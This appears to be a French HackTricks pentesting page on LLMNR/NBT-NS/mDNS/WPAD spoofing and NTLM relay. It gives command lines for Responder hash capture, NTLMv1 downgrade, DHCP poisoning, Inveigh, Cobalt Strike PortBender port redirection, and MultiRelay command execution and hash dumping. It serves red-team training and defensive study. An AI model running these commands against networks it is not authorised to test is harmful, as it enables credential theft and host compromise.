Spoofing LLMNR, NBT-NS, mDNS/DNS et WPAD et attaques de relais

Reading time: 7 minutes

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)

Soutenir HackTricks

Protocoles RĂ©seau

Protocoles de RĂ©solution de Nom Local

  • LLMNR, NBT-NS et mDNS :
  • Microsoft et d'autres systĂšmes d'exploitation utilisent LLMNR et NBT-NS pour la rĂ©solution de noms locaux lorsque DNS Ă©choue. De mĂȘme, les systĂšmes Apple et Linux utilisent mDNS.
  • Ces protocoles sont susceptibles d'interception et de spoofing en raison de leur nature non authentifiĂ©e et de diffusion sur UDP.
  • Responder peut ĂȘtre utilisĂ© pour usurper des services en envoyant des rĂ©ponses falsifiĂ©es aux hĂŽtes interrogeant ces protocoles.
  • Des informations supplĂ©mentaires sur l'usurpation de services utilisant Responder peuvent ĂȘtre trouvĂ©es ici.

Protocole de DĂ©couverte Automatique de Proxy Web (WPAD)

  • WPAD permet aux navigateurs de dĂ©couvrir automatiquement les paramĂštres de proxy.
  • La dĂ©couverte est facilitĂ©e via DHCP, DNS, ou un retour Ă  LLMNR et NBT-NS si DNS Ă©choue.
  • Responder peut automatiser les attaques WPAD, dirigeant les clients vers des serveurs WPAD malveillants.

Responder pour le Poisoning de Protocole

  • Responder est un outil utilisĂ© pour empoisonner les requĂȘtes LLMNR, NBT-NS et mDNS, rĂ©pondant sĂ©lectivement en fonction des types de requĂȘtes, ciblant principalement les services SMB.
  • Il est prĂ©installĂ© dans Kali Linux, configurable Ă  /etc/responder/Responder.conf.
  • Responder affiche les hachages capturĂ©s Ă  l'Ă©cran et les enregistre dans le rĂ©pertoire /usr/share/responder/logs.
  • Il prend en charge Ă  la fois IPv4 et IPv6.
  • La version Windows de Responder est disponible ici.

Exécution de Responder

  • Pour exĂ©cuter Responder avec les paramĂštres par dĂ©faut : responder -I <Interface>
  • Pour un sondage plus agressif (avec des effets secondaires potentiels) : responder -I <Interface> -P -r -v
  • Techniques pour capturer les dĂ©fis/rĂ©ponses NTLMv1 pour un craquage plus facile : responder -I <Interface> --lm --disable-ess
  • L'usurpation WPAD peut ĂȘtre activĂ©e avec : responder -I <Interface> --wpad
  • Les requĂȘtes NetBIOS peuvent ĂȘtre rĂ©solues Ă  l'IP de l'attaquant, et un proxy d'authentification peut ĂȘtre mis en place : responder.py -I <interface> -Pv

Poisoning DHCP avec Responder

  • Le spoofing des rĂ©ponses DHCP peut empoisonner de maniĂšre permanente les informations de routage d'une victime, offrant une alternative plus discrĂšte au poisoning ARP.
  • Cela nĂ©cessite une connaissance prĂ©cise de la configuration du rĂ©seau cible.
  • ExĂ©cution de l'attaque : ./Responder.py -I eth0 -Pdv
  • Cette mĂ©thode peut capturer efficacement les hachages NTLMv1/2, mais nĂ©cessite une manipulation prudente pour Ă©viter toute perturbation du rĂ©seau.

Capture de Credentials avec Responder

  • Responder usurpera des services en utilisant les protocoles mentionnĂ©s ci-dessus, capturant des credentials (gĂ©nĂ©ralement NTLMv2 Challenge/RĂ©ponse) lorsqu'un utilisateur tente de s'authentifier contre les services usurpĂ©s.
  • Des tentatives peuvent ĂȘtre faites pour rĂ©trograder Ă  NetNTLMv1 ou dĂ©sactiver ESS pour un craquage de credentials plus facile.

Il est crucial de noter que l'utilisation de ces techniques doit ĂȘtre effectuĂ©e lĂ©galement et Ă©thiquement, en s'assurant d'une autorisation appropriĂ©e et en Ă©vitant toute perturbation ou accĂšs non autorisĂ©.

Inveigh

Inveigh est un outil pour les testeurs de pĂ©nĂ©tration et les Ă©quipes rouges, conçu pour les systĂšmes Windows. Il offre des fonctionnalitĂ©s similaires Ă  Responder, effectuant des attaques de spoofing et de l'homme du milieu. L'outil a Ă©voluĂ© d'un script PowerShell Ă  un binaire C#, avec Inveigh et InveighZero comme principales versions. Des paramĂštres dĂ©taillĂ©s et des instructions peuvent ĂȘtre trouvĂ©s dans le wiki.

Inveigh peut ĂȘtre utilisĂ© via PowerShell :

powershell
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

Ou exécuté en tant que binaire C#:

bash
Inveigh.exe

NTLM Relay Attack

Cette attaque exploite les sessions d'authentification SMB pour accéder à une machine cible, accordant un shell systÚme si elle réussit. Les prérequis clés incluent :

  • L'utilisateur authentifiĂ© doit avoir un accĂšs administrateur local sur l'hĂŽte relayĂ©.
  • La signature SMB doit ĂȘtre dĂ©sactivĂ©e.

445 Port Forwarding and Tunneling

Dans les scĂ©narios oĂč l'introduction directe dans le rĂ©seau n'est pas rĂ©alisable, le trafic sur le port 445 doit ĂȘtre redirigĂ© et tunnelĂ©. Des outils comme PortBender aident Ă  rediriger le trafic du port 445 vers un autre port, ce qui est essentiel lorsque l'accĂšs administrateur local est disponible pour le chargement de pilotes.

PortBender setup and operation in Cobalt Strike:

bash
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna) beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory beacon> upload C:\PortBender\WinDivert64.sys # Upload driver beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445 beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server beacon> socks 1080 # Establish a SOCKS proxy on port 1080 # Termination commands beacon> jobs beacon> jobkill 0 beacon> rportfwd stop 8445 beacon> socks stop

Autres outils pour l'attaque de relais NTLM

  • Metasploit : ConfigurĂ© avec des proxies, des dĂ©tails sur les hĂŽtes locaux et distants.
  • smbrelayx : Un script Python pour relayer les sessions SMB et exĂ©cuter des commandes ou dĂ©ployer des portes dĂ©robĂ©es.
  • MultiRelay : Un outil de la suite Responder pour relayer des utilisateurs spĂ©cifiques ou tous les utilisateurs, exĂ©cuter des commandes ou extraire des hachages.

Chaque outil peut ĂȘtre configurĂ© pour fonctionner via un proxy SOCKS si nĂ©cessaire, permettant des attaques mĂȘme avec un accĂšs rĂ©seau indirect.

Fonctionnement de MultiRelay

MultiRelay est exécuté depuis le /usr/share/responder/tools répertoire, ciblant des IP ou des utilisateurs spécifiques.

bash
python MultiRelay.py -t <IP target> -u ALL # Relay all users python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes # Proxychains for routing traffic

Ces outils et techniques forment un ensemble complet pour mener des attaques par relais NTLM dans divers environnements réseau.

Forcer les connexions NTLM

Dans Windows, vous pouvez ĂȘtre en mesure de forcer certains comptes privilĂ©giĂ©s Ă  s'authentifier sur des machines arbitraires. Lisez la page suivante pour apprendre comment :

Force NTLM Privileged Authentication

Références

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)

Soutenir HackTricks